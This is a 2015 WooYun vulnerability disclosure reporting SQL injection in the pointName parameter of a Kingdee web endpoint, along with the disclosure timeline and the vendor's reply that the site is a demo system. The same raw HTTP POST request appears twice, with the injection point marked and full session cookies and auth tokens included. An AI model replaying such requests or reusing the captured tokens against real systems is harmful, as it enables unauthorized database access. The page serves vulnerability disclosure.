当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131463

漏洞标题:金蝶某站存在SQL注射漏洞第二枚(上百表轻松暴出)

相关厂商:金蝶

漏洞作者: 沦沦

提交时间:2015-08-04 09:15

修复时间:2015-09-18 14:20

公开时间:2015-09-18 14:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-04: 细节已通知厂商并且等待厂商处理中
2015-08-04: 厂商已经确认,细节仅向厂商公开
2015-08-14: 细节向核心白帽子及相关领域专家公开
2015-08-24: 细节向普通白帽子公开
2015-09-03: 细节向实习白帽子公开
2015-09-18: 细节向公众公开

简要描述:

RT

详细说明:

POST /SystemConfig/GetPoints HTTP/1.1
Host: k3xs.kingdee.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://k3xs.kingdee.com/SystemConfig/PointAudit
Content-Length: 73
Cookie: _ga=GA1.2.1208085774.1436852166; Hm_lvt_aff7fbe8fcb98b060541077cc76465f2=1437438091,1437718560,1438045311,1438649013; pgv_pvi=133623808; __utma=98319621.1208085774.1436852166.1437438091.1437438091.1; __utmz=98319621.1437438091.1.1.utmcsr=job.kingdee.com|utmccn=(referral)|utmcmd=referral|utmcct=/; CNZZDATA1253261474=18132078-1437438233-%7C1438649179; Hm_lpvt_aff7fbe8fcb98b060541077cc76465f2=1438649013; PHPSESSID=0tj3robc2o1hnkdjijlo9iq176; smesc=MTg1YTI5Nzg3NDU4MTRhMGU5MWZiYTZmNmRjNWE1NjM%3D; nts_mail_user=13580111111%3A0%3AV1.0.0; ASP.NET_SessionId=tmbux3wjedykhlvrjbfakcy0; .ASPXAUTH=E95A7F091EAAB66CF9386ACD2C4A744332930B494766E6B0CD85CEDBF71AC2370DB424487859E385991E6E0E6171F1E1FDDFB4E77F99B605E30B14BBD53E140E121AE5288E58FFC6D3A0DB4D0971AD152804813BDFEC9030E3F146A16637BF4289E6D4C4A91D1F04CB746D4BE8FE37AAC124297D2CA03A933FDE2DCE2EBA53411C8945AFE6FC18A09CE236651AAC4C79E758358A0385C603248218C50BC3D734
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
pointType=-1&pointName=11*&empName=&page=1&rows=20&sort=PointID&order=desc


pointName参数没进行过滤

1.jpg

2.jpg

漏洞证明:

POST /SystemConfig/GetPoints HTTP/1.1
Host: k3xs.kingdee.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://k3xs.kingdee.com/SystemConfig/PointAudit
Content-Length: 73
Cookie: _ga=GA1.2.1208085774.1436852166; Hm_lvt_aff7fbe8fcb98b060541077cc76465f2=1437438091,1437718560,1438045311,1438649013; pgv_pvi=133623808; __utma=98319621.1208085774.1436852166.1437438091.1437438091.1; __utmz=98319621.1437438091.1.1.utmcsr=job.kingdee.com|utmccn=(referral)|utmcmd=referral|utmcct=/; CNZZDATA1253261474=18132078-1437438233-%7C1438649179; Hm_lpvt_aff7fbe8fcb98b060541077cc76465f2=1438649013; PHPSESSID=0tj3robc2o1hnkdjijlo9iq176; smesc=MTg1YTI5Nzg3NDU4MTRhMGU5MWZiYTZmNmRjNWE1NjM%3D; nts_mail_user=13580111111%3A0%3AV1.0.0; ASP.NET_SessionId=tmbux3wjedykhlvrjbfakcy0; .ASPXAUTH=E95A7F091EAAB66CF9386ACD2C4A744332930B494766E6B0CD85CEDBF71AC2370DB424487859E385991E6E0E6171F1E1FDDFB4E77F99B605E30B14BBD53E140E121AE5288E58FFC6D3A0DB4D0971AD152804813BDFEC9030E3F146A16637BF4289E6D4C4A91D1F04CB746D4BE8FE37AAC124297D2CA03A933FDE2DCE2EBA53411C8945AFE6FC18A09CE236651AAC4C79E758358A0385C603248218C50BC3D734
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
pointType=-1&pointName=11*&empName=&page=1&rows=20&sort=PointID&order=desc


pointName参数没进行过滤

1.jpg

2.jpg

修复方案:

过滤,送礼物

版权声明:转载请注明来源 沦沦@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-08-04 14:18

厂商回复:

谢谢对金蝶安全的关注,此系统为演示系统,我们已通知相关部门处理。

最新状态:

暂无